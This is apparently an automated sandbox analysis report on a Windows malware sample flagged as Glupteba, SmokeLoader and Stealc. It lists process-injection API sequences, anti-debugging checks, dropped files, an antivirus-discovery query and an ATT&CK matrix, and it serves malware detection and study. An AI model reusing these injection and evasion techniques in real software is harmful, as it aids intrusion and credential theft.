                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004F092B mov eax, dword ptr fs:[00000030h]1_2_004F092B
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004F0D90 mov eax, dword ptr fs:[00000030h]1_2_004F0D90
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0052BC29 push dword ptr fs:[00000030h]1_2_0052BC29
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_006C092B mov eax, dword ptr fs:[00000030h]6_2_006C092B
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_006C0D90 mov eax, dword ptr fs:[00000030h]6_2_006C0D90
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0072C141 push dword ptr fs:[00000030h]6_2_0072C141
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_0233D0A3 push dword ptr fs:[00000030h]7_2_0233D0A3
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_02500042 push dword ptr fs:[00000030h]7_2_02500042
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 10_2_0040AEA4 mov eax, dword ptr fs:[00000030h]10_2_0040AEA4
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 10_2_00407D21 mov eax, dword ptr fs:[00000030h]10_2_00407D21
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 16_2_00407D21 mov eax, dword ptr fs:[00000030h]16_2_00407D21
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 16_2_0040AEA4 mov eax, dword ptr fs:[00000030h]16_2_0040AEA4
                  Source: C:\ProgramData\Drivers\csrss.exeCode function: 24_2_02800083 push dword ptr fs:[00000030h]24_2_02800083
                  Source: C:\ProgramData\Drivers\csrss.exeCode function: 24_2_02A00042 push dword ptr fs:[00000030h]24_2_02A00042
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005CBB00 GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,DestroyIcon,_memset,SetDefaultCommConfigW,FreeEnvironmentStringsW,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoA,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryA,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessHeap,_wprintf,_calloc,_calloc,_memset,_calloc,SetProcessWorkingSetSize,7_2_005CBB00
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_00401114 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00401114
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_00403309 SetUnhandledExceptionFilter,7_2_00403309
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_00402F85 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00402F85
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Benign windows process drops PE files
                  Source: C:\Windows\explorer.exeFile created: 93D2.exe.2.drJump to dropped file
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeDomain query: my.account.sony.com
                  Source: C:\Windows\explorer.exeDomain query: winoui.com
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_02500110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,7_2_02500110
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeThread created: C:\Windows\explorer.exe EIP: B291A88Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejThread created: unknown EIP: 8A51A88Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeThread created: unknown EIP: AA119F0
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeMemory written: C:\Users\user\AppData\Local\Temp\8837.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\ProgramData\Drivers\csrss.exeMemory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeProcess created: C:\Users\user\AppData\Local\Temp\8837.exe C:\Users\user\AppData\Local\Temp\8837.exeJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4248 -ip 4248
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1396
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\DC49.exe C:\Users\user\AppData\Local\Temp\DC49.exe
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 10_2_004082B6 CheckTokenMembership,AllocateAndInitializeSid,FreeSid,10_2_004082B6
                  Source: explorer.exe, 00000002.00000000.1528967263.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1530927276.0000000004480000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1528967263.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000002.00000000.1528967263.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000002.00000000.1528967263.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000002.00000000.1528699265.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanq
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: _LcidFromHexString,GetLocaleInfoA,1_2_0041F653
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,1_2_0041FA79
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,1_2_0041FA12
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: GetLocaleInfoW,_GetPrimaryLen,1_2_0041F6FA
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s,1_2_0041FAB5
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_0041F55E
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_0041F926
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedDecrement,GetAtomNameW,SetDefaultCommConfigW,FreeEnvironmentStringsA,GetCurrentDirectoryA,EnumDateFormatsA,GetStartupInfoA,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,GetLocaleInfoW,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryW,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessWorkingSetSize,1_2_00416FD0
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: EnumSystemLocalesA,1_2_0041F9E9
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: _LcidFromHexString,GetLocaleInfoA,6_2_0041F653
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: _GetPrimaryLen,EnumSystemLocalesA,6_2_0041FA79
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: _GetPrimaryLen,EnumSystemLocalesA,6_2_0041FA12
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: GetLocaleInfoW,_GetPrimaryLen,6_2_0041F6FA
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s,6_2_0041FAB5
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0041F55E
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_0041F926
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedDecrement,GetAtomNameW,SetDefaultCommConfigW,FreeEnvironmentStringsA,GetCurrentDirectoryA,EnumDateFormatsA,GetStartupInfoA,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,GetLocaleInfoW,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryW,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessWorkingSetSize,6_2_00416FD0
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: EnumSystemLocalesA,6_2_0041F9E9
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_0040DC53
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_0040E079
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_0040E012
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_0040DCFA
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_0040E0B5
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_0040DD55
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: GetLocaleInfoA,7_2_00411109
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_0040B1BE
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,7_2_0040A244
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_0040AED0
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,7_2_004092EC
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,7_2_00404EB4
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_0040DB5E
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,DestroyIcon,_memset,SetDefaultCommConfigW,FreeEnvironmentStringsW,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoA,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryA,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessHeap,_wprintf,_calloc,_calloc,_memset,_calloc,SetProcessWorkingSetSize,7_2_005CBB00
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_0040DF26
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,7_2_0040B72B
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_004093C6
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,7_2_00410FD4
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: EnumSystemLocalesA,7_2_0040DFE8
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeQueries volume information: C:\Users\user\AppData\Local\Temp\BB62.exe VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00416F60 FreeEnvironmentStringsW,CreateNamedPipeW,FileTimeToLocalFileTime,1_2_00416F60
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005CBF60 GetSystemTimes,GetSystemTimes,FlushFileBuffers,GetVolumeInformationW,FlushFileBuffers,GetVolumeInformationW,7_2_005CBF60
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Glupteba
                  Source: Yara matchFile source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.2e00e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000021.00000002.2027202659.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2034312044.0000000003243000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 39.3.DC49.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.DC49.exe.2c40e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.DC49.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1793962447.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1550099786.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2031135707.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000003.1975503858.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1549874616.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2031801803.0000000004851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Stealc
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Remote Access Functionality

                  barindex
                  Yara detected Glupteba
                  Source: Yara matchFile source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.2e00e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000021.00000002.2027202659.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2034312044.0000000003243000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 39.3.DC49.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.DC49.exe.2c40e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.DC49.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1793962447.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1550099786.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2031135707.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000003.1975503858.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1549874616.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2031801803.0000000004851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Stealc
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts21
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		13
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts3
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution                  		1
                  Registry Run Keys / Startup Folder                  		1
                  Access Token Manipulation                  		1
                  Abuse Elevation Control Mechanism                  		Security Account Manager35
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  PowerShell                  		1
                  Bootkit                  		513
                  Process Injection                  		3
                  Obfuscated Files or Information                  		NTDS1
                  Query Registry                  		Distributed Component Object ModelInput Capture4
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Registry Run Keys / Startup Folder                  		22
                  Software Packing                  		LSA Secrets561
                  Security Software Discovery                  		SSHKeylogging125
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials261
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  File Deletion                  		DCSync3
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                  Masquerading                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow2
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Access Token Manipulation                  		Network Sniffing1
                  Remote System Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd513
                  Process Injection                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
